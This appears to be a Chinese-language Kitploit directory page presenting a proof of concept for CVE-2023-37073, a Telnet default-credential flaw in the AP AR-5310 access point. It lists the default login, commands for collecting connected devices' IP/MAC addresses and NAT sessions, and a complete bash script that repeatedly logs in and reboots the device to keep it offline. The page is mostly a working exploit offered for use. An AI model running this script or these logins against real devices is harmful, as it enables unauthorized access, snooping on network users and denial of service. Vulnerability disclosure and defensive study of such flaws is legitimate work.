Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-37073 — Telnet默认凭据可能导致信息泄露和拒绝服务(DoS)攻击。 | Kitploit
工具/GitHubGitHub/hamza0x/cve-2023-37073
物联网安全密码攻击漏洞利用信息收集硬件与物联网安全
GitHubhamza0x/cve-2023-37073

CVE-2023-37073

Telnet默认凭据可能导致信息泄露和拒绝服务(DoS)攻击。

查看仓库
22年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-37073

Telnet 默认凭据可能导致信息泄露和拒绝服务 (DoS) 攻击。

复现步骤

此漏洞影响 AP AR-5310

root@kitploit:~
  Telnet 192.168.1.1
  username:user
  password:user
  然后 Boom ... 你已登录 

通过 Telnet 默认凭据泄露信息

root@kitploit:~
    当你通过 Telnet 服务登录后,
    输入命令 'help' 或 '?' 可查看
    可用选项:
    
    > reboot, ping, lanhosts, passwd
  
    > restoredefault, nslookup, traceroute
  
    > save, uptime, exitOnIdle, wan, version,
  
    > serialnumber, modelname, tr69cfg, nat

root@kitploit:~
  要获取连接到网络的每个设备的 IP 和 MAC 地址,
  请运行命令 'lanhosts'。
  要显示通过接入点 (AP) 的所有 NAT 会话,
  请使用命令 'nat show session'

DoS 攻击

root@kitploit:~
  要执行拒绝服务 (DoS) 攻击,
  请运行命令 'reboot' 重新启动 AP。
  我想编写一个脚本来自动化
  持续重启 AP 的操作。

通过 shell 脚本自动化 DoS 攻击

root@kitploit:~
#!/bin/bash

# Telnet credentials
USER="user"
PASSWORD="user"
HOST="192.168.1.1"

# Function to check host availability
check_host_availability() {
    ping -c 1 -W 1 "$HOST" > /dev/null 2>&1
    return $?
}

# Loop to check host availability and execute Telnet command when available
while true; do
    if check_host_availability; then
        echo "Host $HOST is reachable. Initiating Telnet connection and reboot..."
        { sleep 1; echo "$USER"; sleep 1; echo "$PASSWORD"; sleep 1; echo "reboot"; sleep 1; } | telnet "$HOST"
    else
        echo "Host $HOST is not reachable. Retrying in 10 seconds..."
        sleep 10
    fi
done
下载工具